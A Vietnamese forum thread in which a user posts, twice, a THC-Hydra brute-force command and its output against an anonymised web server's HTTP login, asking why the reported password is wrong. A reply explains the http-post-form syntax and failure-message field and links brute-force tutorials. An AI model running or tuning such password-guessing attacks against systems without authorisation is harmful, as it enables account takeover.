Hydra đưa cho em sai mật khẩu ạ

[Hoài Linh]

Linh~MacBook:~hydra -l admin -P rockyou.txt -f -V xxx.xxx.xx.xxx http-get /
Hydra (http://www.thc.org/thc-hydra) starting at 2020-03-18 08:40:47
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 13193371 login tries (l:1/p:13193371), ~12884 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "123456" - 1 of 13193371 [child 0] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "12345" - 2 of 13193371 [child 1] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "123456789" - 3 of 13193371 [child 2] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "password" - 4 of 13193371 [child 3] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "iloveyou" - 5 of 13193371 [child 4] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "princess" - 6 of 13193371 [child 5] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "1234567" - 7 of 13193371 [child 6] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "rockyou" - 8 of 13193371 [child 7] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "12345678" - 9 of 13193371 [child 8] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "abc123" - 10 of 13193371 [child 9] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "nicole" - 11 of 13193371 [child 10] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "daniel" - 12 of 13193371 [child 11] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "babygirl" - 13 of 13193371 [child 12] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "monkey" - 14 of 13193371 [child 13] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "lovely" - 15 of 13193371 [child 14] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "jessica" - 16 of 13193371 [child 15] (0/0)
[80] [www] host: xxx.xxx.xx.xxx login: admin password: 11112222
[STATUS] attack finished for xxx.xxx.xx.xxx (valid pair found)
1 of 1 target successfully comleted, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-03-18 08:20:14
*mật khẩu sai*
Ai giúp đỡ em với. Em cảm ơn nhiều ạ.

 

Linh~MacBook:~hydra -l admin -P rockyou.txt -f -V xxx.xxx.xx.xxx http-get /
Hydra (http://www.thc.org/thc-hydra) starting at 2020-03-18 08:40:47
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 13193371 login tries (l:1/p:13193371), ~12884 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "123456" - 1 of 13193371 [child 0] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "12345" - 2 of 13193371 [child 1] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "123456789" - 3 of 13193371 [child 2] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "password" - 4 of 13193371 [child 3] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "iloveyou" - 5 of 13193371 [child 4] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "princess" - 6 of 13193371 [child 5] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "1234567" - 7 of 13193371 [child 6] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "rockyou" - 8 of 13193371 [child 7] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "12345678" - 9 of 13193371 [child 8] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "abc123" - 10 of 13193371 [child 9] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "nicole" - 11 of 13193371 [child 10] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "daniel" - 12 of 13193371 [child 11] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "babygirl" - 13 of 13193371 [child 12] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "monkey" - 14 of 13193371 [child 13] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "lovely" - 15 of 13193371 [child 14] (0/0)
[ATTEMPT] target xxx.xxx.xx.xxx - login "admin" - pass "jessica" - 16 of 13193371 [child 15] (0/0)
[80] [www] host: xxx.xxx.xx.xxx login: admin password: 11112222
[STATUS] attack finished for xxx.xxx.xx.xxx (valid pair found)
1 of 1 target successfully comleted, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-03-18 08:20:14
*mật khẩu sai*
Ai giúp đỡ em với. Em cảm ơn nhiều ạ.

Hi bạn
Layout of command: hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
Theo như cú pháp của bạn thì bạn chưa điền trường Error Message, trường này khi webserver response với 1 từ khóa nào đó ví dụ login failed thì sẽ tiếp tục bruteforce, còn khi server response lại không có từ này Hydra sẽ báo đó là mật khẩu.
Bạn có thể tham khảo thêm :
https://whitehat.vn/threads/brute-force-voi-hydra.8203/
https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/